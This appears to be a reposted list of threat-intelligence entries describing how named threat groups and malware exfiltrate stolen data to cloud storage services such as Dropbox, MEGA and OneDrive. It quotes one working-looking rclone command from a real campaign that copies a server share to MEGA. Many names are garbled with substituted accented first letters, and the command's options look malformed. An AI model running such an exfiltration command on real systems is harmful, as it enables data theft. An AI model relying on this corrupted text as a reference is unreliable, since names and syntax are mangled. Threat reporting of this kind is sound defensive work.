Octopus has exfiltrated data to file sharing sites. LuminousMoth has exfiltrated data to Google Drive. Leviathan has used an uploader known as LUNCHMONEY that can exfiltrate files to Dropbox. Kimsuky has exfiltrated stolen files and data to actor-controlled Blogspot accounts. HEXANE has used cloud services, including OneDrive, for data exfiltration. HAMMERTOSS exfiltrates data by uploading it to accounts created by the actors on Web cloud storage providers for the adversaries to retrieve later. HAFNIUM has exfiltrated data to file sharing sites, including MEGA. įIN7 has exfiltrated stolen data to the MEGA file sharing site. Įmpire can use Dropbox for data exfiltration.
Įarth Lusca has used the megacmd tool to upload stolen files from a victim network to MEGA. Ĭrutch has exfiltrated stolen data to Dropbox. ĬreepyDrive can use cloud services including OneDrive for data exfiltration. Ĭonfucius has exfiltrated victim data to cloud storage service accounts. Ĭlambling can send files from a victim's machine to Dropbox. Ĭhimera has exfiltrated stolen data to OneDrive accounts. ĭuring C0015, the threat actors exfiltrated files and sensitive data to the MEGA cloud storage site using the Rclone command rclone.exe copy -max-age 2y "\\SERVER\Shares" Mega:DATA -q -ignore-existing -auto-confirm -multi-thread-streams 7 -transfers 7 -bwlimit 10M. īoxCaon has the capability to download folders' contents on the system and upload the results back to its Dropbox drive. BoomBox can upload data to dedicated per-victim folders in Dropbox.
0 kommentar(er)
